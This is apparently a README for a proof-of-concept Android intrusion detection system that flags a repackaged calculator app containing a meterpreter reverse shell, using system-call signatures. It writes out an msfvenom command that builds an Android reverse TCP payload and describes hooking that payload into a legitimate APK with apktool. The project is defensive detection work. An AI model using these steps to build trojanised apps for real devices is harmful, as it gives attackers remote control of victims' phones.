
Android Host-based IDS

Primary LanguagePythonMIT LicenseMIT

HIDS_Android: Host-Based Intrusion detection system for Android


The main idea behind this implementation is a proof of concept that takes two same applications, one legit and the other repackaged with a malicious payload (msfvenom). Then, apply signature detection, based on system calls to match certain type of pattern. Eventually, this allows to detect or prevent some attack, in our case, the execution of meterpreter commands through a reverse_tcp shell.

Defense environment:

This PoC relies on three hosts all connected to the same network

  • Kali linux VM : Acts as a remote attack machine, which the reverse tcp shell, waiting for the malicious application to be launched.
  • Android x86 VM (Kitkat 4.4): Acts as the victim phone/tablet
  • Centos host: acts as the HIDS and connects remotely to the Androidx86 through ADB (Android debug bridge) to launch both applications (legit and malicious) with Monkey while collecting the strace (Zigote) results to be parsed and compared to the signatures.

Repackaging the legit App:

To simulate the repackaging attack, a new malicious version of the legit app (calculator.apk), has been created (com.simplemobiletools.calculator_malicious) embedding a meterpreter payload know as android/meterpreter/reverse tcp. Creation of malicious.apk as below:

msfvenom -p android/meterpreter/reverse_tcp LHOST= LPORT=6130 -o malicious.apk

Decompiling of legit version com.simplemobiletools.calculator.apk along with the malicious.apk, to finally hook the malicious payload and create com.simplemobiletools.calculator_malicious.apk (Tool used: apktool).

Android Desktop with 2 apps

Android Desktop with 2 apps

Running the program:

To test Meterpreter payload signature, the server will wait for an incoming connection to form the reverse_tcp shell, and allow the attacker to run remote command (take a screenshot for example)

MSF reverse_shell

MSF reverse_shell

  • On the Legit App:

hids_android.py com.simplemobiletools.calculator

Legit App detection

Legit App detection

  • On the malicious App:

hids_android.py com.simplemobiletools.calculator

Will raise an alarm, without having the remote attacker server ready to handle the reverse shell

Malicious App detection conn attempt

Malicious App detection attempt

Will now raise an alarm, and kill the application launched, since it detects a reverse shell signature (remote attacker server is ready this time)

Malicious App detection conn detected

Malicious App detection detected

Future work:

Implement Machine Learning in a supervised way, to train and catch legit pattern.